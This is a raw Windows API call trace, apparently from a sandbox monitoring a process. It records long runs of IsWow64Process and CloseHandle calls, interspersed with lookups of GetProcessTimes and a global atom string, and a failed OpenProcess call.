	[0121.645] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.645] CloseHandle (hObject=0x698) returned 1
	[0121.645] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.645] CloseHandle (hObject=0x698) returned 1
	[0121.678] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.678] CloseHandle (hObject=0x698) returned 1
	[0121.679] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.679] CloseHandle (hObject=0x698) returned 1
	[0121.679] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.679] CloseHandle (hObject=0x698) returned 1
	[0121.679] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.679] CloseHandle (hObject=0x698) returned 1
	[0121.679] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.679] CloseHandle (hObject=0x698) returned 1
	[0121.679] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.679] CloseHandle (hObject=0x698) returned 1
	[0121.680] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.680] CloseHandle (hObject=0x698) returned 1
	[0121.680] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.680] CloseHandle (hObject=0x698) returned 1
	[0121.680] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.680] CloseHandle (hObject=0x698) returned 1
	[0121.680] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.680] CloseHandle (hObject=0x698) returned 1
	[0121.680] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.680] CloseHandle (hObject=0x698) returned 1
	[0121.681] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.681] CloseHandle (hObject=0x698) returned 1
	[0121.681] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.681] CloseHandle (hObject=0x698) returned 1
	[0121.681] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.681] CloseHandle (hObject=0x698) returned 1
	[0121.681] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.681] CloseHandle (hObject=0x698) returned 1
	[0121.681] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.681] CloseHandle (hObject=0x698) returned 1
	[0121.682] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.682] CloseHandle (hObject=0x698) returned 1
	[0121.682] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.682] CloseHandle (hObject=0x698) returned 1
	[0121.682] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.682] CloseHandle (hObject=0x698) returned 1
	[0121.682] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.682] CloseHandle (hObject=0x698) returned 1
	[0121.683] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.683] CloseHandle (hObject=0x698) returned 1
	[0121.683] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.683] CloseHandle (hObject=0x698) returned 1
	[0121.683] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.683] CloseHandle (hObject=0x698) returned 1
	[0121.683] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.683] CloseHandle (hObject=0x698) returned 1
	[0121.683] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.683] CloseHandle (hObject=0x698) returned 1
	[0121.684] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.684] CloseHandle (hObject=0x698) returned 1
	[0121.684] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.684] CloseHandle (hObject=0x698) returned 1
	[0121.684] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.684] CloseHandle (hObject=0x698) returned 1
	[0121.684] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.684] CloseHandle (hObject=0x698) returned 1
	[0121.684] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.684] CloseHandle (hObject=0x698) returned 1
	[0121.685] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.685] CloseHandle (hObject=0x698) returned 1
	[0121.685] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.685] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0121.685] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0121.685] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.686] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0121.686] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.686] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0121.686] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0121.686] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0121.686] CloseHandle (hObject=0x698) returned 1
	[0121.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0121.686] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.686] CloseHandle (hObject=0x698) returned 1
	[0121.687] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.687] CloseHandle (hObject=0x698) returned 1
	[0121.687] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.687] CloseHandle (hObject=0x698) returned 1
	[0121.687] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.687] CloseHandle (hObject=0x698) returned 1
	[0121.720] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.720] CloseHandle (hObject=0x698) returned 1
	[0121.720] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.720] CloseHandle (hObject=0x698) returned 1
	[0121.720] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.720] CloseHandle (hObject=0x698) returned 1
	[0121.720] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.721] CloseHandle (hObject=0x698) returned 1
	[0121.721] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.721] CloseHandle (hObject=0x698) returned 1
	[0121.721] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.721] CloseHandle (hObject=0x698) returned 1
	[0121.721] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.721] CloseHandle (hObject=0x698) returned 1
	[0121.721] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.721] CloseHandle (hObject=0x698) returned 1
	[0121.721] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.722] CloseHandle (hObject=0x698) returned 1
	[0121.722] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.722] CloseHandle (hObject=0x698) returned 1
	[0121.722] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.722] CloseHandle (hObject=0x698) returned 1
	[0121.723] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.723] CloseHandle (hObject=0x698) returned 1
	[0121.723] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.723] CloseHandle (hObject=0x698) returned 1
	[0121.723] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.723] CloseHandle (hObject=0x698) returned 1
	[0121.723] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.723] CloseHandle (hObject=0x698) returned 1
	[0121.724] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.724] CloseHandle (hObject=0x698) returned 1
	[0121.724] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.724] CloseHandle (hObject=0x698) returned 1
	[0121.724] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.724] CloseHandle (hObject=0x698) returned 1
	[0121.724] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.724] CloseHandle (hObject=0x698) returned 1
	[0121.724] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.724] CloseHandle (hObject=0x698) returned 1
	[0121.725] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.725] CloseHandle (hObject=0x698) returned 1
	[0121.725] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.725] CloseHandle (hObject=0x698) returned 1
	[0121.725] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.725] CloseHandle (hObject=0x698) returned 1
	[0121.725] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.725] CloseHandle (hObject=0x698) returned 1
	[0121.725] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.725] CloseHandle (hObject=0x698) returned 1
	[0121.726] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.726] CloseHandle (hObject=0x698) returned 1
	[0121.726] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.726] CloseHandle (hObject=0x698) returned 1
	[0121.726] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.726] CloseHandle (hObject=0x698) returned 1
	[0121.726] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.726] CloseHandle (hObject=0x698) returned 1
	[0121.727] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.727] CloseHandle (hObject=0x698) returned 1
	[0121.727] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.727] CloseHandle (hObject=0x698) returned 1
	[0121.727] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.727] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0121.728] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0121.728] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.728] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0121.729] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.744] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0121.744] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0121.744] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0121.744] CloseHandle (hObject=0x698) returned 1
	[0121.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0121.745] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.745] CloseHandle (hObject=0x698) returned 1
	[0121.745] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.745] CloseHandle (hObject=0x698) returned 1
	[0121.746] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.746] CloseHandle (hObject=0x698) returned 1
	[0121.746] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.746] CloseHandle (hObject=0x698) returned 1
	[0121.780] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.780] CloseHandle (hObject=0x698) returned 1
	[0121.780] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.780] CloseHandle (hObject=0x698) returned 1
	[0121.781] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.781] CloseHandle (hObject=0x698) returned 1
	[0121.781] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.781] CloseHandle (hObject=0x698) returned 1
	[0121.781] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.781] CloseHandle (hObject=0x698) returned 1
	[0121.781] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.781] CloseHandle (hObject=0x698) returned 1
	[0121.781] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.781] CloseHandle (hObject=0x698) returned 1
	[0121.782] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.782] CloseHandle (hObject=0x698) returned 1
	[0121.782] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.782] CloseHandle (hObject=0x698) returned 1
	[0121.782] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.782] CloseHandle (hObject=0x698) returned 1
	[0121.782] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.782] CloseHandle (hObject=0x698) returned 1
	[0121.782] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.782] CloseHandle (hObject=0x698) returned 1
	[0121.783] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.783] CloseHandle (hObject=0x698) returned 1
	[0121.783] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.783] CloseHandle (hObject=0x698) returned 1
	[0121.783] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.783] CloseHandle (hObject=0x698) returned 1
	[0121.783] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.783] CloseHandle (hObject=0x698) returned 1
	[0121.783] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.783] CloseHandle (hObject=0x698) returned 1
	[0121.784] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.784] CloseHandle (hObject=0x698) returned 1
	[0121.784] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.784] CloseHandle (hObject=0x698) returned 1
	[0121.784] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.784] CloseHandle (hObject=0x698) returned 1
	[0121.784] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.784] CloseHandle (hObject=0x698) returned 1
	[0121.784] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.785] CloseHandle (hObject=0x698) returned 1
	[0121.785] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.785] CloseHandle (hObject=0x698) returned 1
	[0121.785] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.785] CloseHandle (hObject=0x698) returned 1
	[0121.785] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.785] CloseHandle (hObject=0x698) returned 1
	[0121.785] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.785] CloseHandle (hObject=0x698) returned 1
	[0121.786] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.786] CloseHandle (hObject=0x698) returned 1
	[0121.786] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.786] CloseHandle (hObject=0x698) returned 1
	[0121.786] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.786] CloseHandle (hObject=0x698) returned 1
	[0121.786] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.786] CloseHandle (hObject=0x698) returned 1
	[0121.786] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.786] CloseHandle (hObject=0x698) returned 1
	[0121.787] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.787] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0121.787] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0121.787] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.788] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0121.788] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.788] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0121.788] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0121.788] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0121.788] CloseHandle (hObject=0x698) returned 1
	[0121.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0121.789] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.789] CloseHandle (hObject=0x698) returned 1
	[0121.789] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.789] CloseHandle (hObject=0x698) returned 1
	[0121.789] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.789] CloseHandle (hObject=0x698) returned 1
	[0121.789] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.790] CloseHandle (hObject=0x698) returned 1
	[0121.823] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.823] CloseHandle (hObject=0x698) returned 1
	[0121.823] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.823] CloseHandle (hObject=0x698) returned 1
	[0121.823] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.823] CloseHandle (hObject=0x698) returned 1
	[0121.823] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.823] CloseHandle (hObject=0x698) returned 1
	[0121.823] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.823] CloseHandle (hObject=0x698) returned 1
	[0121.824] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.824] CloseHandle (hObject=0x698) returned 1
	[0121.824] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.824] CloseHandle (hObject=0x698) returned 1
	[0121.824] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.824] CloseHandle (hObject=0x698) returned 1
	[0121.824] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.824] CloseHandle (hObject=0x698) returned 1
	[0121.824] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.824] CloseHandle (hObject=0x698) returned 1
	[0121.824] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.825] CloseHandle (hObject=0x698) returned 1
	[0121.825] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.825] CloseHandle (hObject=0x698) returned 1
	[0121.825] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.825] CloseHandle (hObject=0x698) returned 1
	[0121.825] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.825] CloseHandle (hObject=0x698) returned 1
	[0121.825] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.825] CloseHandle (hObject=0x698) returned 1
	[0121.825] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.825] CloseHandle (hObject=0x698) returned 1
	[0121.826] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.826] CloseHandle (hObject=0x698) returned 1
	[0121.826] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.826] CloseHandle (hObject=0x698) returned 1
	[0121.826] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.826] CloseHandle (hObject=0x698) returned 1
	[0121.826] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.826] CloseHandle (hObject=0x698) returned 1
	[0121.826] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.826] CloseHandle (hObject=0x698) returned 1
	[0121.827] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.827] CloseHandle (hObject=0x698) returned 1
	[0121.827] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.827] CloseHandle (hObject=0x698) returned 1
	[0121.827] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.827] CloseHandle (hObject=0x698) returned 1
	[0121.827] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.827] CloseHandle (hObject=0x698) returned 1
	[0121.827] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.827] CloseHandle (hObject=0x698) returned 1
	[0121.828] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.828] CloseHandle (hObject=0x698) returned 1
	[0121.828] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.828] CloseHandle (hObject=0x698) returned 1
	[0121.828] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.828] CloseHandle (hObject=0x698) returned 1
	[0121.828] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.828] CloseHandle (hObject=0x698) returned 1
	[0121.829] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.829] CloseHandle (hObject=0x698) returned 1
	[0121.829] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.829] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0121.829] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0121.829] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.830] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0121.830] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.830] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0121.830] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0121.830] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0121.830] CloseHandle (hObject=0x698) returned 1
	[0121.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0121.831] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.831] CloseHandle (hObject=0x698) returned 1
	[0121.831] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.831] CloseHandle (hObject=0x698) returned 1
	[0121.831] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.832] CloseHandle (hObject=0x698) returned 1
